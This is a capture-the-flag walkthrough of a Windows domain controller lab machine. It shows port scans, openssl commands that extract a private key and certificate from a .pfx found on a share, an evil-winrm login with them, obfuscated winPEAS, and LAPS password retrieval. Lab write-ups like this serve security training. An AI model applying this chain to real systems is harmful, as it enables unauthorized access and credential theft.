TL;DR
- The shares reveals a file .pfx
- From the pfx we get a certificate and private key
- We use those files to access the machine
- We then use WinPeas to find another credentials
- The new user has permissions to see the LAPS passwords
- We retrieve the administrator password and connect to his account
NETWORK
rustscan -a 10.10.11.152
Open 10.10.11.152:53
Open 10.10.11.152:88
Open 10.10.11.152:135
Open 10.10.11.152:139
Open 10.10.11.152:389
Open 10.10.11.152:445
Open 10.10.11.152:464
Open 10.10.11.152:593
Open 10.10.11.152:636
Open 10.10.11.152:3268
Open 10.10.11.152:3269
Open 10.10.11.152:5986
Open 10.10.11.152:9389
Open 10.10.11.152:49667
Open 10.10.11.152:49674
Open 10.10.11.152:49673
Open 10.10.11.152:49696
Open 10.10.11.152:54443
nmap -sCV 10.10.11.152 -Pn -p53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49674,49673,49696,54443 -oN nmap_selected_ports
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 04:21 EDT
Nmap scan report for 10.10.11.152
Host is up (0.027s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-31 16:21:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_ssl-date: 2022-03-31T16:23:01+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
54443/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-31T16:22:24
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.20 seconds
ENUMERATION
Checking shares
FOOTHOLD
Files exploration
We have found a password
We have found another credential
Extract data out of pfx
A .PFX (Personal Information Exchange) file is used to store a certificate and its private and public keys. For example, if we need to transfer an SSL certificate from one windows server to another, You can simply export it as a .pfx file using IIS SSL export wizard or MMC console.
Private Key
The following command extracts the embedded private key
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes
Certificate
The following command extracts the certificate
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem
Using the following command we got access on the machine as user legacyy
/opt/evil-winrm/evil-winrm.rb -i 10.10.11.152 -S -k modified-priv-key.key -c certificate.pem
PRIV ESCALATION
Manual enumeration
We don’t have much to go with, in terms of permissions
But the user svc_deploy has an extra permissions related to information we have found in the shares
From user legacyy to user svc_deploy
Using the obfuscated version of winPEAS winPEASx64_ofs.exe
We have found the following
Let’s copy this file to our local machine
We have found svc_deploy credentials
From user svc_deploy to Administrator
Abusing LAPS
Import-Module .\laps.ps1
Let’s retrieve the LAPS password
CAPTURE FLAGS
